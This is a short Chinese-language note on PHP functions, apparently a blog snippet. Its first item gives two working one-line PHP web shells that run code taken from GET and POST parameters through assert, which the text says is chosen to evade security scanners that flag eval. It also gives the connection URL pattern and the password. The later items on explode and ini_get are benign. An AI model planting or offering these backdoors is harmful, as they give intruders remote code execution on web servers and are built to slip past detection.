1. assert eval assert跟eval 函数把字符串当php代码来执行 由于eval臭名超著 为了躲避查杀 那么就用到了assert 常见的两种:(1)<?php ($_=@$_GET
.
1. assert eval
assert跟eval 函数把字符串当php代码来执行 由于eval臭名超著 为了躲避查杀 那么就用到了assert
常见的两种:
(1)<?php ($_=@$_GET[2]).@$_($_POST[1])?>连接方式:http://site/1.php?2=assert 密码是1 (2)<?php assert($_POST["fuckTX"]);?>
2.exolode:
explode 使用一个字符串分割另一个字符串 返回是数组
$a= "test1 test2 test3 test4 test5 test6"; $b= explode(" ", $a); var_dump ($b).'<br/>';3.ini_get
获取一个php.ini配置选项的值
<?phpif (ini_get('allow_url_include')) { echo 'ON';} else { echo 'Off';}?>